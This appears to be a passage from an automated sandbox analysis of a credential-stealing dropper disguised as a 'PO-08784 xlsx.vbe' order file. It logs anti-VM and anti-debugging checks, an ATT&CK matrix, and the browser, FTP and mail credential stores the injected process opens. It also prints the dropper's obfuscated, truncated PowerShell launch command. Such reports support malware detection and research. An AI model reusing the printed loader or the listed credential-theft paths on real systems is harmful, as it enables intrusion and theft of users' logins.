          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dllJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9096
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 639
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1F9C0006 sldt word ptr [eax]
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformation
          Source: wscript.exe, 00000000.00000003.761029190.0000016BB47B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU = Tox
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: CasPol.exe, 00000011.00000002.5818301150.00000000014E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: PO-08784 xlsx.vbeBinary or memory string: To3 = To3 & "e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU"
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000004.00000002.1748826369.00000000074DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeG
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 00000011.00000002.5826675755.0000000001544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeent
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat

          Anti Debugging

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread information set: HideFromDebugger
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_20456418 LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guard
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop abedimchpuntmoisp,ceiunnlatfl birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""t
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop abedimchpuntmoisp,ceiunnlatfl birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""t
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: Yara matchFile source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_010E4A7A bind,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_010E4A55 bind,
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          2
          OS Credential Dumping
          1
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Exfiltration Over Alternative Protocol
          2
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts11
          Scripting
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          Deobfuscate/Decode Files or Information
          1
          Credentials in Registry
          115
          System Information Discovery
          Remote Desktop Protocol2
          Data from Local System
          Exfiltration Over Bluetooth11
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts21
          Command and Scripting Interpreter
          Logon Script (Windows)11
          Process Injection
          11
          Scripting
          Security Account Manager421
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          Automated Exfiltration1
          Non-Standard Port
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          PowerShell
          Logon Script (Mac)Logon Script (Mac)1
          Obfuscated Files or Information
          NTDS1
          Process Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer2
          Non-Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
